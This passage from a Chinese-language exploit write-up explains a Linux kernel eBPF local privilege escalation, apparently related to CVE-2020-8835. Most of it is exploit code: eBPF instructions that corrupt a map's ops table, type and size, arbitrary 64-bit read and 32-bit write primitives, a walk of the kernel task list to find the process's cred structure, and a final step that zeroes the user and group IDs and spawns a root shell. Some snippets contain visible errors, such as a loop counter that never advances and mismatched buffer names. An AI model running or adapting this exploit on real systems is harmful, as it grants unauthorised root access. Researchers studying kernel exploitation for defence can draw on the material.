            BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0xd0),    // r6 *= 0xd0
            BPF_MAP_GET_ADDR(0, BPF_REG_7),             // r7= &map.elem[0]
            BPF_ALU64_REG(BPF_SUB, BPF_REG_7,BPF_REG_6),    // r7 -= r6 
            BPF_MAP_GET(2, BPF_REG_8),                      // r8 = map.elem[2] (target_addr - 0x58)
            // The source is a register, so the store must be BPF_STX_MEM;
            // BPF_ST_MEM stores an immediate and takes (size, dst, off, imm).
            BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),    // *(u64 *)(r7 + 0) = r8
            BPF_EXIT_INSN(),

//trigger code
// arbitrary 64-bit read: use bpf_obj_get_info_by_fd to read two 4-byte halves and join them
/*
 * Reads 8 bytes from `addr`.
 *
 * Each half is obtained the same way: map elem[2] is set to the target
 * address minus 0x58, op 1 is selected through elem[1], the program is
 * triggered with write_msg(), and the 32-bit field at offset 0x40 of the
 * buffer filled by bpf_obj_get_info_by_fd() is taken as the result.
 *
 * Returns the assembled value, or 0 if an info call fails and fail() returns.
 */
size_t read64(size_t addr)
{
    /* The info call is given a length of 0x50 and the result is read at
     * offset 0x40, so the buffer must hold 0x50 bytes (it was 50 decimal,
     * which is too small for both). */
    char buf[0x50] = { 0 };
    uint32_t hi_32, lo_32;
    update_elem(0, 0);
    update_elem(1, 1);  //write btf
    update_elem(2, addr - 0x58);    // target addr - 0x58 (offsetof(btf, id))

    write_msg();

    if(bpf_obj_get_info_by_fd(mapfd, 0x50, buf)){
        fail("failed in bpf_obj_get_info_by_fd.");
        return 0;
    }

    // return value in bpf_map_info->btf_id (offset is 0x40)
    lo_32 = *(unsigned int*)(&buf[0x40]);

    // same again for the upper half, 4 bytes further on
    update_elem(2, addr - 0x58 + 4);
    write_msg();
    if(bpf_obj_get_info_by_fd(mapfd, 0x50, buf)){
        fail("failed in bpf_obj_get_info_by_fd.");
        return 0;
    }
    hi_32 = *(unsigned int*)(&buf[0x40]);
    /* C cast syntax; `size_t(hi_32)` is a C++ functional cast. */
    return ((size_t)hi_32 << 32) | lo_32;
}
任意地址写

现在,我们可以利用前述漏洞获取map相关的地址信息,并可篡改相关地址(可通过map偏移获取的)上的内容,例如覆写bpf_map的ops函数指针,但是还没有任意地址写的能力。ops函数指针的第一个参数往往都是bpf_map结构,使得很多已知的函数不可用。看起来可行的就是利用bpf_map原生的函数。

其中array map的map_get_next_key实现(array_map_get_next_key)如下

/* Compute the key that follows *@key and store it through @next_key.
 *
 * @key may be NULL, in which case the index is taken as U32_MAX.
 * Returns 0 after writing *@next_key, or -ENOENT (without writing) when the
 * index is the last valid one.
 */
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
    struct bpf_array *array = container_of(map, struct bpf_array, map);
    u32 index = key ? *(u32 *)key : U32_MAX;
    u32 *next = (u32 *)next_key;

    /* Out-of-range (or missing) key: restart from index 0. */
    if (index >= array->map.max_entries) {
        *next = 0;
        return 0;
    }

    /* Last element: there is no next key. */
    if (index == array->map.max_entries - 1)
        return -ENOENT;

    /* Otherwise a 32-bit store of index + 1 through next_key. */
    *next = index + 1;
    return 0;
}

当index < array->map.max_entries - 1时,始终执行*next = index + 1;当map.max_entries == 0xffffffff时,该条件对所有index < 0xfffffffe都成立。

而当key和next_key可控时,这就是一个任意地址写u32(四个字节)的途径

*(u32*)next_key = *key + 1;

ops->map_push_elem函数原型和它相兼容,且两个参数可控

int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);

如果将ops->map_push_elem函数替换为array_map_get_next_key,即可达到任意地址写。

map->ops->map_push_elem的唯一调用路径来自bpf_map_update_value,且要求map_type为特定的类型。

else if (map->map_type == BPF_MAP_TYPE_QUEUE ||
           map->map_type == BPF_MAP_TYPE_STACK ||
           map->map_type == BPF_MAP_TYPE_BLOOM_FILTER) {
        err = map->ops->map_push_elem(map, value, flags);
    }

因此,构造任意地址写的步骤

1: 在可控的expmap.value上复制一份ops虚函数表,并将其中的map_push_elem替换为array_map_get_next_key
2: 将expmap->ops改写为指向这份伪造的虚函数表
3: 将expmap->max_entries设置为0xffffffff
4: 将expmap->map_type设置为BPF_MAP_TYPE_STACK
复制ops虚函数表,并替换map_push_elem
// Step 3: replace map->ops->map_push_elem with map_get_next_key
    char fake_ops[0xe8] = { 0 };
    for(int i=0; i<0xe8; i+8){
        // make a fake ops at &value[0x10]
        *(size_t*)&ops[i] = read64(ops_addr + i);   
        update_elem(0x10 + i/8, *(size_t*)&ops[i]);
    }
    update_elem(0x10 + 15*8, *(size_t*)&ops[4 * 0x8]);

之后的步骤通过eBPF实现

BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 3, 60), // if r7 != 3 goto exit   (op=3: prepare arbitrary write)
            BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),    // r8 = r6  ; save r6
            BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),   // r6 = r6*0x110
            BPF_MAP_GET_ADDR(0, BPF_REG_7),             // r7 = &value[0]
            // register operands below need the register-source form (_REG)
            BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),   // r7 -= r6;    r7 = &map.ops
            BPF_MAP_GET(2, BPF_REG_6),                  // r6 = value[2]
            BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_6, 0),   //  *(r7+0) = r6
            // r6 was overwritten by BPF_MAP_GET; restore it from the copy
            // saved in r8 (r7 holds a pointer here, not the saved value).
            BPF_MOV64_REG(BPF_REG_6, BPF_REG_8),            //  r6 = r8 ; recover r6
            BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0xf8),        // r8 *= 0xf8
            BPF_MAP_GET_ADDR(0, BPF_REG_7),                 // r7 = &value[0]
            BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8),   // r7 -= r8;    r7 = &map.map_type
            BPF_ST_MEM(BPF_W, BPF_REG_7, 0, 0x17),          // *(r7 + 0) = 0x17;    (STACK)
            BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),            // r8 = r6
            BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0xec),        // r6 = r6*0xec
            BPF_MAP_GET_ADDR(0, BPF_REG_7),                 // r7 = &value[0]
            BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6),   // r7 -= r6;    r7 = &map.max_entries
            BPF_ST_MEM(BPF_W, BPF_REG_7, 0, -1),            // *(r7 + 0) = -1
            BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0xe4),        // r8 *= 0xe4
            BPF_MAP_GET_ADDR(0, BPF_REG_7),                 // r7 = &value[0]
            BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8),   // r7 -= r8; r7 = &map.spin_lock_off
            BPF_ST_MEM(BPF_W, BPF_REG_7, 0, 0),             // map.spin_lock_off = 0
            BPF_EXIT_INSN(),

任意地址写的方法

/*
 * Stores the 32-bit value `data` at `addr`.
 *
 * The update call passes a pointer to (data - 1) as the value and `addr` as
 * the flags argument.  Once map_push_elem has been redirected to
 * array_map_get_next_key, that routine stores "*value + 1" through the
 * flags pointer, which is why the value is decremented first.
 * Calls fail() if the update returns non-zero.
 */
void write32(size_t addr, uint32_t data)
{
    uint64_t first_key = 0;

    data -= 1;  /* the hijacked callback adds 1 back before storing */
    if (bpf_update_elem(mapfd, &first_key, &data, addr) != 0) {
        fail("bpf_update_elem failed '%s'\n", strerror(errno));
    }
}
/*
 * Stores the 64-bit value `data` at `addr` as two 32-bit writes:
 * the low half at addr, then the high half at addr + 4.
 */
void write64(size_t addr, size_t data)
{
    uint32_t lo = data & 0xffffffff;
    uint32_t hi = (data & 0xffffffff00000000) >> 32;
    /* The unused local `key` was removed; write32() supplies its own. */
    write32(addr, lo);
    write32(addr+4, hi);
}
泄漏task_struct cred

init_pid_ns命名空间中保存着系统所有进程的task结构。先泄漏init_pid_ns地址(根据之前泄漏的内核基地址+偏移计算),再利用任意地址读获取task地址,遍历链表得到指定进程的task结构地址

// Step 4: Leak task_struct 
#define INIT_PID_NS 0x111
    size_t init_pid_ns = linux_base + INIT_PID_NS;
    // init_pid_ns is a size_t: %zx is the matching conversion, %llx is not.
    printf("init_pid_ns: 0x%zx\n", init_pid_ns);
    // get current pid
    pid_t pid = getpid();
    size_t cred_addr = 0;
    size_t task_addr = read64(init_pid_ns + 0x30);  // task_struct* 
    size_t first_task = task_addr;                  // remember where the walk started

    // search current process's task_struct->cred

    while(1){
        // read64() returns 8 bytes; only the low 32 bits are the pid
        pid_t p = (pid_t)read64(task_addr + 0x908);    // get task_struct's pid
        printf("iter pid: %d...\n", p);

        if(pid == p){
            printf("got target cred!\n");
            cred_addr = read64(task_addr + 0xac8);
            break;
        }

        // task_struct = task_struct->next
        task_addr = read64(task_addr + 0x808) - 0x808;

        // The list is expected to be circular: stop after one full lap
        // instead of spinning forever when the pid is never found.
        if(task_addr == first_task){
            fail("target task_struct not found\n");
            break;
        }
    }

LPE

在成功泄漏进程cred地址后,只需要利用构造的任意地址写,完成修改cred即可提权

// Step 7: overwrite cred...
    clear_btf();
    update_elem(0, 0);
    update_elem(1, 3);  //  option = 3: prepare for arbitrary write
    update_elem(2, values_addr + 0x80);     // new map->ops = values_addr + 0x80 (fake_ops at &value[0x10])
    write_msg();
    // Zero four consecutive 32-bit fields at cred+4 .. cred+16
    // (presumably uid/gid/suid/sgid — confirm against the target's struct cred).
    write32(cred_addr+4, 0);
    write32(cred_addr+8, 0);
    write32(cred_addr+12, 0);
    write32(cred_addr+16, 0);
    // Only spawn a shell if the overwrite actually made us root.
    if(getuid() == 0){
        puts("Spawn shell;");
        system("/bin/sh");
    }
    return 0;

参考

cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification

kernel-pwning-with-ebpf-a-love-story

点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖